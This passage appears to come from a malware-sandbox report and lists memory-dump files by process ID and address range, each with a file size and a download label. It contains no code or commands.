                      • memory/3904-205-0x0000000007F50000-0x0000000007FE6000-memory.dmp

                        Filesize

                        600KB

                        Download

                      • memory/3904-140-0x0000000003460000-0x0000000003470000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3904-226-0x0000000003460000-0x0000000003470000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3904-224-0x0000000007EE0000-0x0000000007EF4000-memory.dmp

                        Filesize

                        80KB

                        Download

                      • memory/3904-91-0x0000000003460000-0x0000000003470000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3904-165-0x0000000006D40000-0x0000000006D5E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/3904-88-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3904-87-0x00000000033A0000-0x00000000033D6000-memory.dmp

                        Filesize

                        216KB

                        Download

                      • memory/3904-237-0x0000000073930000-0x00000000740E0000-memory.dmp

                        Filesize

                        7.7MB

                        Download

                      • memory/3904-147-0x000000007FA90000-0x000000007FAA0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3904-145-0x0000000070770000-0x00000000707BC000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/3904-192-0x0000000007CA0000-0x0000000007CBA000-memory.dmp

                        Filesize

                        104KB

                        Download

                      • memory/3904-137-0x0000000006860000-0x000000000687E000-memory.dmp

                        Filesize

                        120KB

                        Download

                      • memory/3904-89-0x0000000003460000-0x0000000003470000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/3904-138-0x00000000069B0000-0x00000000069FC000-memory.dmp

                        Filesize

                        304KB

                        Download

                      • memory/3904-230-0x0000000007F20000-0x0000000007F28000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/3904-168-0x0000000006E60000-0x0000000006F03000-memory.dmp

                        Filesize

                        652KB

                        Download

                      • memory/3904-222-0x0000000007EB0000-0x0000000007EC1000-memory.dmp

                        Filesize

                        68KB

                        Download

                      • memory/3904-229-0x0000000003460000-0x0000000003470000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/4788-245-0x0000025C11F20000-0x0000025C11F40000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/4788-248-0x0000025C12420000-0x0000025C12440000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/4788-252-0x0000025C11EC0000-0x0000025C11EE0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5024-144-0x00007FFDB8890000-0x00007FFDB9351000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/5024-82-0x0000000000270000-0x0000000000278000-memory.dmp

                        Filesize

                        32KB

                        Download

                      • memory/5024-219-0x000000001AED0000-0x000000001AEE0000-memory.dmp

                        Filesize

                        64KB

                        Download

                      • memory/5024-83-0x00007FFDB8890000-0x00007FFDB9351000-memory.dmp

                        Filesize

                        10.8MB

                        Download

                      • memory/5084-54-0x00007FF79BF90000-0x00007FF79C3CC000-memory.dmp

                        Filesize

                        4.2MB

                        Download

                      • memory/5084-35-0x00007FF79BF90000-0x00007FF79C3CC000-memory.dmp

                        Filesize

                        4.2MB

                        Download

                      • memory/5744-183-0x000002B34DCB0000-0x000002B34DCD0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5744-184-0x000002B34E220000-0x000002B34E240000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5744-178-0x000002B34DC90000-0x000002B34DCB0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5744-176-0x000002B34DCD0000-0x000002B34DCF0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5932-263-0x0000023010BF0000-0x0000023010C10000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5932-265-0x0000023010BB0000-0x0000023010BD0000-memory.dmp

                        Filesize

                        128KB

                        Download

                      • memory/5932-267-0x0000023010FF0000-0x0000023011010000-memory.dmp

                        Filesize

                        128KB

                        Download